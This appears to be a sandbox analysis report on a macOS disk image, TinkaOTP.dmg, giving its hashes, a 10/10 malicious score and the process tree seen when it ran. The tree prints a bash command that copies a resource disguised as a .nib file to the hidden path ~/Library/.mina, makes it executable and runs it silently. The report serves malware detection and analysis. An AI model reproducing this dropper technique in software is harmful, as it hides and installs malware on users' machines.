Resubmissions

06-05-2023 12:48

230506-p126bahb92 1

06-05-2023 12:30

230506-pptd2ahb52 1

12-06-2021 11:09

210612-nqn9qdfdq2 10

12-06-2021 11:04

210612-h83qfce7ax 10

12-06-2021 10:49

210612-mkbljdyans 10

04-06-2021 11:41

210604-617hnrwhna 10

03-06-2021 22:37

210603-9ndgvgx33n 10

03-06-2021 17:09

210603-gxrvff2tan 10

03-06-2021 16:24

210603-lv4d7lhgcs 10

Analysis

  • max time network
    155s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    03-06-2021 17:09

General

  • Target

    TinkaOTP.dmg

  • Size

    6.2MB

  • MD5

    81f8f0526740b55fe484c42126cd8396

  • SHA1

    fe83d95afce63e935dbe22aef40a164cee34f4e5

  • SHA256

    899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53

  • SHA512

    751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a

Score
10/10

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    1⤵
      PID:464
    • /bin/bash
      sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
      1⤵
        PID:464
      • /usr/bin/sudo
        sudo open /Volumes/TinkaOTP/TinkaOTP.app
        1⤵
          PID:464
          • /usr/bin/open
            open /Volumes/TinkaOTP/TinkaOTP.app
            2⤵
              PID:465
          • /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            1⤵
              PID:466
            • /bin/bash
              /bin/bash -c "cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1"
              1⤵
                PID:469
                • /bin/cp
                  cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/run/Library/.mina
                  2⤵
                    PID:470
                  • /bin/chmod
                    chmod +x /Users/run/Library/.mina
                    2⤵
                      PID:471
                    • /Users/run/Library/.mina
                      /Users/run/Library/.mina
                      2⤵
                        PID:472

Network

MITRE ATT&CK Matrix

Downloads